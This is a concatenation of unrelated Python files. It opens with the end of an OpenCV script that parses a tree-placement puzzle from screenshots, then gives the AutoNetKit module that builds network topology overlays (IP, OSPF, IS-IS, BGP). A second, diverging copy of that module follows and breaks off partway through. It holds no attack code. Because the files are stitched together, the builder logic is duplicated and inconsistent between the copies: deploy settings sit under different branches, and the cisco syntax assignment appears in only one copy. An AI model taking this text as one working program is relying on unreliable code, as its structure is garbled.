        keep = max(1, math.floor(len(sorted_candidates) * 0.1))
        candidates = sorted_candidates[:keep]
        step //= 2
        if not step:
            break
        # candidate expansion for next iteration.
        candidates = {
            y
            for x in candidates
            for y in [x - step, x, x + step]
            if min_width <= y <= max_width
        }
    # On loop exit `candidates` is still the sorted, trimmed list, so the
    # best width sits at the front.  (Removed the original's unused
    # `pat_w, pat_h, _ = pat.shape` unpack, whose names were also swapped
    # relative to numpy's (height, width, channels) order.)
    best_target_width = candidates[0]
    print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
    return best_target_width
def resample_pattern_from_image(pat_orig, img):
    """Re-extract the pattern from img at its best-matching scale and spot."""
    width = optimize_pattern_width(pat_orig, img)
    pat = scale_pattern(pat_orig, width)
    pat_h, pat_w, _ = pat.shape
    scores = cv2.matchTemplate(img, pat, tm_method)
    _, _, _, best_loc = cv2.minMaxLoc(scores)
    col, row = best_loc
    return img[row:row + pat_h, col:col + pat_w]
def main_scale_pattern_and_match():
    """Match the tree template against the 18x18 sample and visualize scores."""
    img = load_sample(18)
    pat_orig = cv2.imread('../sample/tree-sample.png')
    pat = resample_pattern_from_image(pat_orig, img)
    pat_h, pat_w, _ = pat.shape
    print(pat.shape)
    result = cv2.matchTemplate(img, pat, tm_method)
    # BUG FIX: cv2.normalize's second positional parameter is `dst`; the
    # original cv2.normalize(result, 0, 255) never passed the 0..255 range
    # as alpha/beta.  Spell the arguments out for a min-max stretch.
    result_norm = cv2.normalize(result, None, 0, 255, cv2.NORM_MINMAX)
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
    # now the problem lies in how should we find this threshold.
    # it is promising here to analyze histogram to determine this value.
    img_marked = find_and_mark_matches(img, result, [pat_h, pat_w], 0.95)
    print(f'min: {min_val}, max: {max_val}')
    top_left = max_loc
    bottom_right = (top_left[0] + pat_w, top_left[1] + pat_h)
    pyplot.figure().canvas.set_window_title('@dev')
    pyplot.subplot(131), pyplot.imshow(result_norm, cmap='gray')
    pyplot.title('result'), pyplot.xticks([]), pyplot.yticks([])
    # opencv stores in BGR while pyplot in RGB. (https://stackoverflow.com/a/41869419/315302)
    pyplot.subplot(132), pyplot.imshow(img_marked[:, :, [2, 1, 0]])
    pyplot.title('origin'), pyplot.xticks([]), pyplot.yticks([])
    pyplot.subplot(133), pyplot.hist(result.flatten(), range=(0.9, 1.0))
    pyplot.title('hist')
    pyplot.show()
def subplot_gray(num, img, title):
    """Render a grayscale image into subplot `num` with axis ticks hidden."""
    pyplot.subplot(num)
    pyplot.imshow(img, cmap='gray')
    pyplot.title(title)
    pyplot.xticks([])
    pyplot.yticks([])
def subplot_color(num, img, title):
    """Render a BGR image into subplot `num` (channel-swapped to RGB)."""
    pyplot.subplot(num)
    pyplot.imshow(img[:, :, [2, 1, 0]])  # OpenCV is BGR, pyplot expects RGB
    pyplot.title(title)
    pyplot.xticks([])
    pyplot.yticks([])
def main_all_samples():
    """Report the optimized template width for every available sample size."""
    pat_orig = cv2.imread('../sample/tree-sample.png')
    for i in range(5, 22 + 1):
        sample = load_sample(i)
        target_width = optimize_pattern_width(pat_orig, sample)
        print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold = 3):
    """
    Given a dict d and an expected # of elements,
    derive a list of row values (or column values) from it.

    Coordinates within `threshold` of the first coordinate of the open
    group are merged into it; each finished group is reduced to its
    count-weighted average.  Asserts that exactly `size` groups remain.
    """
    groups = []
    anchor, current = None, None  # first key of the open group, its members
    for coord, count in sorted(d.items(), key=lambda kv: kv[0]):
        if current is None:
            anchor, current = coord, {coord: count}
        elif coord - anchor < threshold:
            current[coord] = count
        else:
            groups.append(current)
            anchor, current = coord, {coord: count}
    if current is not None:
        groups.append(current)
    # TODO: given sufficient info we might be able to
    # "fill in the blank" if there are missing elements,
    # but for now it seems good enough to not worry about
    # this issue.
    assert len(groups) == size

    # calculate weighted average from grouping elements.
    def weighted_average(members):
        total = sum(members.values())
        return sum(k * v for k, v in members.items()) / total

    return map(weighted_average, groups)
def main_find_blanks():
    """Detect the puzzle grid in a sample screenshot by flood-filling blank
    cells, derive row/column bounds, slice out cells and digit labels, then
    display debug views.

    NOTE(review): driven by exact in-game colors and private sample images;
    this is experimental/debug code.
    """
    size = 22
    img = load_sample(size)
    h, w, _ = img.shape
    # This is the exact color that game uses for blank cells.
    bk = (49, 49, 52)
    result = cv2.inRange(img, bk, bk)
    # Per-axis histograms: coordinate -> how many blank regions begin/end there.
    mk_stat = lambda: collections.defaultdict(lambda: 0)
    row_begins_stat = mk_stat()
    row_ends_stat = mk_stat()
    col_begins_stat = mk_stat()
    col_ends_stat = mk_stat()
    # floodFill requires a mask 2 pixels larger than the image.
    mask = np.zeros((h+2,w+2), dtype=np.uint8)
    # skip first region encountered, which is likely just the difficulty box
    # on the top right corner.
    first_skipped = False
    for r in range(h):
        for c in range(w):
            if (result[r,c] != 0):
                x,y = c,r
                # Erase this connected blank region in-place and record its
                # bounding rectangle.
                retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
                rect_x, rect_y, rect_w, rect_h = rect
                if not first_skipped:
                    first_skipped = True
                    continue
                row_begins_stat[rect_y] += 1
                col_begins_stat[rect_x] += 1
                rect_x_end = rect_x + rect_w - 1
                rect_y_end = rect_y + rect_h - 1
                row_ends_stat[rect_y_end] += 1
                col_ends_stat[rect_x_end] += 1
    def make_bounds(begin_stat, end_stat):
        # Collapse noisy begin/end histograms into `size` (lo, hi) pairs.
        begin_coords = map(round, resolve_stat(begin_stat, size))
        end_coords = map(round, resolve_stat(end_stat, size))
        return list(map(lambda x,y: (x,y), begin_coords, end_coords))
    row_bounds = make_bounds(row_begins_stat, row_ends_stat)
    col_bounds = make_bounds(col_begins_stat, col_ends_stat)
    # Slice the board into size x size cell images (bounds are inclusive).
    cells = [ [ None for _ in range(size) ] for _ in range(size)]
    for r, (row_lo, row_hi) in enumerate(row_bounds):
        for c, (col_lo, col_hi) in enumerate(col_bounds):
            cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
    def find_tree(cell_img):
        # A cell contains a tree iff the exact tree shade color is present.
        # Returns a 4x4 tile (white = tree, black = none) for the debug view.
        color_shade = (0x55, 0xc8, 0x87)
        result = cv2.inRange(cell_img, color_shade, color_shade)
        (_,_,w,h) = cv2.boundingRect(result)
        if w != 0 and h != 0:
            color = 0xFF
        else:
            color = 0
        return np.full((4,4), color)
    recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
    cell_results_recombined = np.concatenate([
        np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
    ], axis=0)
    max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
    def extract_digit(row,col):
        # Crop a digit-label area the size of the largest cell.
        return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
    # Suppose first two cells are A and B, we can then find a cell C if we extend
    # difference between A and B but in the other direction.
    # A - (B - A) = 2A - B
    digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
    digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
    color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
    color_sat = (0x97, 0xa7, 0xc8)
    side_length_for_display = math.ceil(max_cell_side * 1.1)
    def process_digit_cell(dg_img):
        # Extract the digit shape and crop it to its bounding box; None when
        # the cell has no unsat-colored pixels.
        result = cv2.inRange(dg_img, color_unsat, color_unsat)
        (x,y,w,h) = cv2.boundingRect(result)
        if w == 0 or h == 0:
            return None
        return result[y:y+h,x:x+w]
    def padding_digit_img(dg_img):
        # Center the cropped digit on a fixed-size gray canvas for display.
        if dg_img is None:
            return np.full((side_length_for_display, side_length_for_display), 0x7F)
        h, w = dg_img.shape
        top = math.floor((side_length_for_display - h) / 2)
        bottom = side_length_for_display - top - h
        left = math.floor((side_length_for_display - w) / 2)
        right = side_length_for_display - left - w
        return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
    # TODO: make a matrix of matching results of matchTemplate for row / col digits.
    # where the template is digits cropped by bounding rect,
    # and image is the digit picture after inRange filter.
    # TODO: scaling is for now ignored but we'll do something about it
    # plan: run boundingRect on digit image, and use height of resulting
    # rectangle to scale the template into same height before matchTemplate run.
    # digits accompanying every column.
    col_digits = [
        extract_digit(digit_row_start,col_lo)
        for col_lo, _ in col_bounds
    ]
    col_digit_templs = [ process_digit_cell(d) for d in col_digits ]
    # same but for rows
    row_digits = [
        extract_digit(row_lo,digit_col_start)
        for row_lo, _ in row_bounds
    ]
    row_digit_templs = [ process_digit_cell(d) for d in row_digits ]
    def debug_cross_compare(digits, digit_templs):
        # Print a score matrix: each digit image matched against every
        # template, rescaling the template to the digit's bounding-box width.
        def rescale_and_match(img, templ_in, tm_method):
            # NOTE: parameters shadow the outer `img`/`tm_method`; this
            # helper operates only on its arguments.
            (_,_,w,h) = cv2.boundingRect(img)
            if w == 0 or h == 0:
                return None
            else:
                # try to rescale pattern to match image width (of the bounding rect)
                # we are targeting width here because we can prevent one digit pattern
                # to match with multiple digit ones this way.
                # also because digits tend to vary more in horizontal direction
                # so we are actually eliminating lots of candidates this way.
                templ = scale_pattern(templ_in, w)
                templ_h, _ = templ.shape
                if templ_h > h:
                    return None
                result = cv2.matchTemplate(img, templ, tm_method)
                _, max_val, _, _ = cv2.minMaxLoc(result)
                return max_val
        for dg_img_pre in digits:
            dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
            line = []
            for templ in digit_templs:
                if templ is None:
                    line.append('------')
                    continue
                max_val = rescale_and_match(dg_img,templ,tm_method)
                if max_val is None:
                    line.append('------')
                    continue
                line.append(f'{max_val:.4f}')
            print(', '.join(line))
    print('Mat for row digits:')
    debug_cross_compare(row_digits, row_digit_templs)
    print('Mat for col digits:')
    debug_cross_compare(col_digits, col_digit_templs)
    # Montage of all padded digit templates: row digits above column digits.
    digits = np.concatenate(
        [
            np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
            np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
        ])
    # digit sample extraction steps (for each single cell image)
    # (TODO: for simplicity, let's only consider color of unsat digits for now)
    # - cv2.inRange to extract shape of the digit
    # - cv2.boundingRect to find the bounding rectangle
    # - crop it and save it as image.
    # - for sat digits, the checkmark needs to be extracted,
    #   but that's not an immediate issue as most of the digits are indeed unsat.
    # - note that a digit cell can contain multiple digits,
    #   we could get only a partial digit, but that doesn't really affect
    #   the correctness of matchTemplate.
    show = True
    if show:
        pyplot.figure().canvas.set_window_title('@dev')
        subplot_color(221, img, 'origin')
        subplot_color(222, recombined, 'extracted')
        subplot_gray(223, digits, 'digits')
        subplot_gray(224, cell_results_recombined, 'find tree')
        pyplot.show()
# Entry point: run the grid-extraction experiment by default.
if __name__ == '__main__':
    # main_scale_pattern_and_match()
    main_find_blanks()
|
import autonetkit
import autonetkit.anm
import autonetkit.ank as ank
import itertools
import autonetkit.ank_pika
import autonetkit.config
settings = autonetkit.config.settings
import autonetkit.log as log
import autonetkit.load.graphml as graphml
import autonetkit.exception
import networkx as nx
import os
# Public API of this module.
__all__ = ['build']

# Message-bus channel used to push updated topologies to listeners.
rabbitmq_server = settings['Rabbitmq']['server']
pika_channel = autonetkit.ank_pika.AnkPika(rabbitmq_server)
#TODO: seperate out load and build - build should take a ready made nx graph and work from there.... load should do file handling error checking etc
# Also makes automated testing easier!
def build(input_graph_string, timestamp):
    """Load a topology file and build all overlays (phy, ip, igp, bgp).

    Returns the populated AbstractNetworkModel, or None when only an
    unavailable development reader could parse the input.

    NOTE(review): `timestamp` is not used inside this function - confirm
    with callers before removing it.
    """
    #TODO: move this out of main console wrapper
    anm = autonetkit.anm.AbstractNetworkModel()
    try:
        input_graph = graphml.load_graphml(input_graph_string)
    except autonetkit.exception.AnkIncorrectFileFormat:
        # try a different reader
        try:
            import autonetkit.load.worm as worm
        except ImportError:
            return # module not present (development module)
        input_graph = worm.load(input_graph_string)
    # add local deployment host
    settings['General']['deploy'] = True
    settings['Deploy Hosts']['internal'] = {
        'cisco': {
            'deploy': True,
        },
    }
    #TODO: make this more explicit than overloading add_overlay - make it load_graph or something similar
    input_undirected = nx.Graph(input_graph)
    for node in input_graph:
        #del input_graph.node[node]['router config']
        #del input_graph.node[node]['device_subtype']
        pass
    #nx.write_graphml(input_graph, "output.graphml")
    G_in = anm.add_overlay("input", input_undirected)
    #G_in_directed = anm.add_overlay("input_directed", input_graph, directed = True)
    import autonetkit.plugins.graph_product as graph_product
    graph_product.expand(G_in) # apply graph products if relevant
    if len(ank.unique_attr(G_in, "asn")) > 1:
        # Multiple ASNs set, use label format device.asn
        anm.set_node_label(".", ['label', 'pop', 'asn'])
    #TODO: remove, used for demo on nectar
    #for node in G_in:
    #node.platform = "netkit"
    #node.host = "nectar1"
    #G_in.data.igp = "ospf"
    # set syntax for routers according to platform
    #TODO: make these defaults
    G_in.update(G_in.nodes("is_router", platform = "junosphere"), syntax="junos")
    G_in.update(G_in.nodes("is_router", platform = "dynagen"), syntax="ios")
    G_in.update(G_in.nodes("is_router", platform = "netkit"), syntax="quagga")
    G_in.update(G_in.nodes("is_router", platform = "cisco"), syntax="ios")
    G_graphics = anm.add_overlay("graphics") # plotting data
    G_graphics.add_nodes_from(G_in, retain=['x', 'y', 'device_type', 'device_subtype', 'pop', 'asn'])
    # Build the derived overlays in dependency order.
    build_phy(anm)
    #update_pika(anm)
    #build_conn(anm)
    build_ip(anm)
    igp = G_in.data.igp or "ospf" #TODO: make default template driven
    #TODO: make the global igp be set on each node - this way can also support different IGPs per router
    # Add overlays even if not used: simplifies compiler where can check for presence in overlay (if blank not present, don't configure ospf etc)
    anm.add_overlay("ospf")
    anm.add_overlay("isis")
    if igp == "ospf":
        build_ospf(anm)
    if igp == "isis":
        build_isis(anm)
    build_bgp(anm)
    return anm
def build_bgp(anm):
    """Build the directed BGP overlay: eBGP edges between ASes, plus iBGP
    as a full mesh for small topologies or via route reflectors otherwise.
    """
    # eBGP
    G_phy = anm['phy']
    G_in = anm['input']
    G_bgp = anm.add_overlay("bgp", directed = True)
    G_bgp.add_nodes_from(G_in.nodes("is_router"))
    # An input edge whose endpoints differ in ASN is an eBGP session.
    ebgp_edges = [edge for edge in G_in.edges() if not edge.attr_equal("asn")]
    G_bgp.add_edges_from(ebgp_edges, bidirectional = True, type = 'ebgp')
    # now iBGP
    if len(G_phy) < 500:
        # full mesh
        for asn, devices in G_phy.groupby("asn").items():
            routers = [d for d in devices if d.is_router]
            ibgp_edges = [ (s, t) for s in routers for t in routers if s!=t]
            G_bgp.add_edges_from(ibgp_edges, type = 'ibgp')
    else:
        # Large topology: full mesh is too big, use route reflectors.
        import autonetkit.plugins.route_reflectors as route_reflectors
        route_reflectors.allocate(G_phy, G_bgp)
    #TODO: probably want to use l3 connectivity graph for allocating route reflectors
    # Mark routers that terminate at least one eBGP session.
    ebgp_nodes = [d for d in G_bgp if any(edge.type == 'ebgp' for edge in d.edges())]
    G_bgp.update(ebgp_nodes, ebgp=True)
def build_ip(anm):
    """Build the "ip" overlay: aggregate switches, split L3-L3 links into
    collision-domain nodes, then allocate IP addresses.

    NOTE(review): Python 2 era code (iterator .next()).
    """
    import autonetkit.plugins.ip as ip
    G_ip = anm.add_overlay("ip")
    G_in = anm['input']
    G_graphics = anm['graphics']
    G_phy = anm['phy']
    G_ip.add_nodes_from(G_in)
    G_ip.add_edges_from(G_in.edges(type="physical"))
    ank.aggregate_nodes(G_ip, G_ip.nodes("is_switch"), retain = "edge_id")
    #TODO: add function to update edge properties: can overload node update?
    # Insert a collision-domain node in the middle of every router-router edge.
    edges_to_split = [edge for edge in G_ip.edges() if edge.attr_both("is_l3device")]
    split_created_nodes = list(ank.split(G_ip, edges_to_split, retain='edge_id'))
    for node in split_created_nodes:
        # Position the new node between its neighbours for plotting.
        node['graphics'].x = ank.neigh_average(G_ip, node, "x", G_graphics)
        node['graphics'].y = ank.neigh_average(G_ip, node, "y", G_graphics)
        node['graphics'].asn = ank.neigh_most_frequent(G_ip, node, "asn", G_phy) # arbitrary choice
        #TODO: could choose largest ASN if tie break
    #TODO: see if need G_phy - should auto fall through to phy for ASN
    switch_nodes = G_ip.nodes("is_switch")# regenerate due to aggregated
    G_ip.update(switch_nodes, collision_domain=True) # switches are part of collision domain
    G_ip.update(split_created_nodes, collision_domain=True)
    # Assign collision domain to a host if all neighbours from same host
    for node in split_created_nodes:
        if ank.neigh_equal(G_ip, node, "host", G_phy):
            node.host = ank.neigh_attr(G_ip, node, "host", G_phy).next() # first attribute
    # set collision domain IPs
    #TODO: trim next line
    collision_domain_id = itertools.count(0)
    for node in G_ip.nodes("collision_domain"):
        graphics_node = G_graphics.node(node)
        graphics_node.device_type = "collision_domain"
        cd_id = collision_domain_id.next()
        node.cd_id = cd_id
        #TODO: Use this label
        if not node.is_switch:
            # Label the collision domain after its attached devices.
            label = "_".join(sorted(ank.neigh_attr(G_ip, node, "label", G_phy)))
            cd_label = "cd_%s" % label # switches keep their names
            node.label = cd_label
            node.cd_id = cd_label
            graphics_node.label = cd_label
    ip.allocate_ips(G_ip)
    ank.save(G_ip)
def build_phy(anm):
    """Build the physical overlay from the input graph, retaining the
    device/platform attributes the compilers need."""
    G_in = anm['input']
    G_phy = anm['phy']
    G_phy.add_nodes_from(G_in, retain=['label', 'update', 'device_type', 'device_subtype', 'asn', 'platform', 'host', 'syntax'])
    if G_in.data.Creator == "Topology Zoo Toolset":
        ank.copy_attr_from(G_in, G_phy, "Network") #TODO: move this into graphml (and later gml) reader
    G_phy.add_edges_from(G_in.edges(type="physical"))
def build_conn(anm):
    """Build the directed "conn" connectivity overlay.

    NOTE(review): the bare `return` below deliberately short-circuits the
    hardware-allocation code that follows, so everything after it is dead.
    """
    G_in = anm['input']
    G_phy = anm['phy']
    G_conn = anm.add_overlay("conn", directed = True)
    G_conn.add_nodes_from(G_in, retain=['label'])
    G_conn.add_edges_from(G_in.edges(type="physical"))
    #if G_in.data.Creator == "Maestro":
    #ank.copy_edge_attr_from(G_in, G_conn, "index")
    return
    # --- dead code below: disabled hardware allocation (see docstring) ---
    import autonetkit.allocate_hardware
    autonetkit.allocate_hardware.allocate(anm)
    G_graphics = anm['graphics']
    new_nodes = set(G_conn) - set(G_phy)
    #G_graphics.add_nodes_from(new_nodes, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
    for node in new_nodes:
        G_graphics.add_node(node, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
        #print node['graphics'].dump()
#TODO: Add a function to auto-update graphics, if any node present in overlay but not in graphics then add with sensible defaults
def build_ospf(anm):
    """
    Build OSPF graph.

    Allowable area combinations:
    0 -> 0
    0 -> x (x!= 0)
    x -> 0 (x!= 0)
    x -> x (x != 0)

    Not-allowed:
    x -> x (x != y != 0)
    """
    G_in = anm['input']
    G_ospf = anm.add_overlay("ospf")
    G_ospf.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
    G_ospf.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
    G_ospf.add_edges_from(G_in.edges(), retain = ['edge_id'])
    ank.copy_attr_from(G_in, G_ospf, "ospf_area", dst_attr = "area") #TODO: move this into graphml (and later gml) reader
    # Collapse switches then re-expand them so routers connect directly.
    ank.aggregate_nodes(G_ospf, G_ospf.nodes("is_switch"), retain = "edge_id")
    ank.explode_nodes(G_ospf, G_ospf.nodes("is_switch"), retain= "edge_id")
    G_ospf.remove_edges_from([link for link in G_ospf.edges() if link.src.asn != link.dst.asn]) # remove inter-AS links
    # Normalize area attribute to an int, defaulting to backbone area 0.
    for router in G_ospf:
        if router.area == "None":
            #TODO: tidy up this default of None being a string
            router.area = 0
        router.area = int(router.area) #TODO: use dst type in copy_attr_from
    # list type
    # Classify each router from its own area vs its neighbours' areas.
    for router in G_ospf:
        neigh_areas = set(ank.neigh_attr(G_ospf, router, "area"))
        if len(neigh_areas) == 1:
            # All neighbors have same area
            neigh_area = neigh_areas.pop()
            if neigh_area != router.area:
                # router is in own area
                if router.area == 0:
                    router.type = "Backbone ABR" # case of single backbone ABR
                else:
                    router.type = "ABR"
            elif neigh_area == 0:
                # all neighbors are in area 0
                router.type = "Backbone"
            else:
                router.type = "Internal"
        else:
            # Neighbours span multiple areas: this router is a border router.
            if router.area == 0:
                router.type = "Backbone ABR"
            else:
                router.type = "ABR"
    #TOOD: set default area, or warn if no area settings
    for router in G_ospf:
        # and set area on interface
        for edge in router.edges():
            if edge.area:
                continue # already allocated (from other "direction", as undirected)
            if router.area == edge.dst.area:
                edge.area = router.area # intra-area
            else:
                if router.area == 0 or edge.dst.area == 0:
                    # backbone to other area
                    if router.area == 0:
                        edge.area = edge.dst.area # router in backbone, use other area
                    else:
                        edge.area = router.area # router not in backbone, use its area
    #
    #TODO: do we want to allocate non-symmetric OSPF costs? do we need a directed OSPF graph?
    # (note this will all change once have proper interface nodes)
    # Uniform default link cost.
    for link in G_ospf.edges():
        link.cost = 1
def ip_to_net_ent_title_ios(ip):
    """ Converts an IP address into an OSI Network Entity Title
    suitable for use in IS-IS on IOS.

    >>> ip_to_net_ent_title_ios(IPAddress("192.168.19.1"))
    '49.1921.6801.9001.00'
    """
    # Accept either a netaddr IPAddress (exposes .words) or anything
    # netaddr can parse into one.
    try:
        ip_words = ip.words
    except AttributeError:
        import netaddr # try to cast to IP Address
        ip = netaddr.IPAddress(ip)
        ip_words = ip.words
    log.debug("Converting IP to OSI ENT format")
    # Zero-pad each octet to three digits, then regroup the resulting
    # 12-digit string into 4-digit chunks between the AFI and the NSEL.
    padded = "".join("%03d" % int(octet) for octet in ip_words) # single string, padded if needed
    parts = ["49", padded[0:4], padded[4:8], padded[8:12], "00"]
    return ".".join(parts)
def build_isis(anm):
    """Build the isis overlay: an intra-AS IS-IS topology with switches collapsed."""
    G_in = anm['input']
    G_ip = anm['ip']
    G_isis = anm.add_overlay("isis")
    #TODO: filter only igp=isis nodes, set the igp as a default in build_network
    G_isis.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
    G_isis.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
    G_isis.add_edges_from(G_in.edges(), retain = ['edge_id'])
    # Collapse each switch cluster, then expand to direct router-router links
    ank.aggregate_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
    ank.explode_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
    # IS-IS only runs inside an AS - drop any edge whose endpoints differ in ASN
    crossing = [link for link in G_isis.edges() if link.src.asn != link.dst.asn]
    G_isis.remove_edges_from(crossing)
    for node in G_isis:
        # NET is derived from the loopback address allocated in the ip overlay
        node.net = ip_to_net_ent_title_ios(G_ip.node(node).loopback)
        node.process_id = 1 # default
    for link in G_isis.edges():
        link.metric = 1 # default
def update_pika(anm):
    """Serialise the ANM and publish it (compressed) on the pika channel."""
    log.debug("Sending anm to pika")
    payload = autonetkit.ank_json.dumps(anm, None)
    pika_channel.publish_compressed("www", "client", payload)
# set syntax from config defaults
import autonetkit
import autonetkit.anm
import autonetkit.ank as ank
import itertools
import autonetkit.ank_pika
import autonetkit.config
settings = autonetkit.config.settings
import autonetkit.log as log
import autonetkit.load.graphml as graphml
import autonetkit.exception
import networkx as nx
import os
__all__ = ['build']
# Messaging setup: connect to the RabbitMQ server named in the user settings
rabbitmq_server = settings['Rabbitmq']['server']
pika_channel = autonetkit.ank_pika.AnkPika(rabbitmq_server)
#TODO: seperate out load and build - build should take a ready made nx graph and work from there.... load should do file handling error checking etc
# Also makes automated testing easier!
def build(input_graph_string, timestamp):
    """Load a topology and construct all overlays (input, graphics, phy, ip, igp, bgp).

    input_graph_string: topology source, tried first with the graphml reader,
    then with the fallback worm reader (development module).
    timestamp: accepted from the console entry point; not used in this body.
    Returns the populated AbstractNetworkModel, or None when the fallback
    reader is not installed.
    """
    #TODO: move this out of main console wrapper
    anm = autonetkit.anm.AbstractNetworkModel()
    try:
        input_graph = graphml.load_graphml(input_graph_string)
    except autonetkit.exception.AnkIncorrectFileFormat:
        # try a different reader
        try:
            import autonetkit.load.worm as worm
        except ImportError:
            return # module not present (development module)
        input_graph = worm.load(input_graph_string)
        # add local deployment host
        settings['General']['deploy'] = True
        settings['Deploy Hosts']['internal'] = {
            'cisco': {
                'deploy': True,
            },
        }
    #TODO: make this more explicit than overloading add_overlay - make it load_graph or something similar
    input_undirected = nx.Graph(input_graph)
    # NOTE(review): this loop is currently a no-op (attribute deletes commented out)
    for node in input_graph:
        #del input_graph.node[node]['router config']
        #del input_graph.node[node]['device_subtype']
        pass
    #nx.write_graphml(input_graph, "output.graphml")
    G_in = anm.add_overlay("input", input_undirected)
    #G_in_directed = anm.add_overlay("input_directed", input_graph, directed = True)
    import autonetkit.plugins.graph_product as graph_product
    graph_product.expand(G_in) # apply graph products if relevant
    if len(ank.unique_attr(G_in, "asn")) > 1:
        # Multiple ASNs set, use label format device.asn
        anm.set_node_label(".", ['label', 'pop', 'asn'])
    #TODO: remove, used for demo on nectar
    #for node in G_in:
        #node.platform = "netkit"
        #node.host = "nectar1"
    #G_in.data.igp = "ospf"
    # set syntax for routers according to platform
    #TODO: make these defaults
    G_in.update(G_in.nodes("is_router", platform = "junosphere"), syntax="junos")
    G_in.update(G_in.nodes("is_router", platform = "dynagen"), syntax="ios")
    G_in.update(G_in.nodes("is_router", platform = "netkit"), syntax="quagga")
    #G_in.update(G_in.nodes("is_router", platform = "cisco"), syntax="ios2")
    G_graphics = anm.add_overlay("graphics") # plotting data
    G_graphics.add_nodes_from(G_in, retain=['x', 'y', 'device_type', 'device_subtype', 'pop', 'asn'])
    build_phy(anm)
    #update_pika(anm)
    #build_conn(anm)
    build_ip(anm)
    igp = G_in.data.igp or "ospf" #TODO: make default template driven
    #TODO: make the global igp be set on each node - this way can also support different IGPs per router
    # Add overlays even if not used: simplifies compiler where can check for presence in overlay (if blank not present, don't configure ospf etc)
    anm.add_overlay("ospf")
    anm.add_overlay("isis")
    if igp == "ospf":
        build_ospf(anm)
    if igp == "isis":
        build_isis(anm)
    build_bgp(anm)
    return anm
def build_bgp(anm):
    """Build the directed bgp overlay: eBGP on inter-AS links, iBGP within each AS."""
    G_phy = anm['phy']
    G_in = anm['input']
    G_bgp = anm.add_overlay("bgp", directed = True)
    G_bgp.add_nodes_from(G_in.nodes("is_router"))
    # eBGP: every input edge whose endpoints differ in ASN
    inter_as_edges = [edge for edge in G_in.edges() if not edge.attr_equal("asn")]
    G_bgp.add_edges_from(inter_as_edges, bidirectional = True, type = 'ebgp')
    # iBGP: full mesh per AS for small topologies, route reflectors otherwise
    if len(G_phy) < 500:
        for asn, devices in G_phy.groupby("asn").items():
            routers = [d for d in devices if d.is_router]
            mesh = [(s, t) for s in routers for t in routers if s != t]
            G_bgp.add_edges_from(mesh, type = 'ibgp')
    else:
        import autonetkit.plugins.route_reflectors as route_reflectors
        route_reflectors.allocate(G_phy, G_bgp)
        #TODO: probably want to use l3 connectivity graph for allocating route reflectors
    # flag every router that carries at least one eBGP session
    speakers = [d for d in G_bgp if any(edge.type == 'ebgp' for edge in d.edges())]
    G_bgp.update(speakers, ebgp=True)
def build_ip(anm):
    """Build the ip overlay: collapse switches into collision domains and allocate IPs.

    Steps: copy physical nodes/edges, aggregate switch clusters, split each
    router-router link with an intermediate collision-domain node, position
    the new nodes for plotting, then hand the graph to the ip plugin for
    address allocation.
    """
    import autonetkit.plugins.ip as ip
    G_ip = anm.add_overlay("ip")
    G_in = anm['input']
    G_graphics = anm['graphics']
    G_phy = anm['phy']
    G_ip.add_nodes_from(G_in)
    G_ip.add_edges_from(G_in.edges(type="physical"))
    ank.aggregate_nodes(G_ip, G_ip.nodes("is_switch"), retain = "edge_id")
    #TODO: add function to update edge properties: can overload node update?
    # insert a collision-domain node on every direct l3device-l3device link
    edges_to_split = [edge for edge in G_ip.edges() if edge.attr_both("is_l3device")]
    split_created_nodes = list(ank.split(G_ip, edges_to_split, retain='edge_id'))
    for node in split_created_nodes:
        # position new nodes between their neighbors for plotting
        node['graphics'].x = ank.neigh_average(G_ip, node, "x", G_graphics)
        node['graphics'].y = ank.neigh_average(G_ip, node, "y", G_graphics)
        node['graphics'].asn = ank.neigh_most_frequent(G_ip, node, "asn", G_phy) # arbitrary choice
        #TODO: could choose largest ASN if tie break
    #TODO: see if need G_phy - should auto fall through to phy for ASN
    switch_nodes = G_ip.nodes("is_switch")# regenerate due to aggregated
    G_ip.update(switch_nodes, collision_domain=True) # switches are part of collision domain
    G_ip.update(split_created_nodes, collision_domain=True)
    # Assign collision domain to a host if all neighbours from same host
    for node in split_created_nodes:
        if ank.neigh_equal(G_ip, node, "host", G_phy):
            node.host = ank.neigh_attr(G_ip, node, "host", G_phy).next() # first attribute
    # set collision domain IPs
    #TODO: trim next line
    collision_domain_id = itertools.count(0)
    for node in G_ip.nodes("collision_domain"):
        graphics_node = G_graphics.node(node)
        graphics_node.device_type = "collision_domain"
        cd_id = collision_domain_id.next()
        node.cd_id = cd_id
        #TODO: Use this label
        if not node.is_switch:
            # name the collision domain after its attached devices
            label = "_".join(sorted(ank.neigh_attr(G_ip, node, "label", G_phy)))
            cd_label = "cd_%s" % label # switches keep their names
            node.label = cd_label
            node.cd_id = cd_label
            graphics_node.label = cd_label
    ip.allocate_ips(G_ip)
    ank.save(G_ip)
def build_phy(anm):
    """Build the physical overlay from the input overlay."""
    G_in = anm['input']
    G_phy = anm['phy']
    retained = ['label', 'update', 'device_type', 'device_subtype',
        'asn', 'platform', 'host', 'syntax']
    G_phy.add_nodes_from(G_in, retain=retained)
    if G_in.data.Creator == "Topology Zoo Toolset":
        #TODO: move this into graphml (and later gml) reader
        ank.copy_attr_from(G_in, G_phy, "Network")
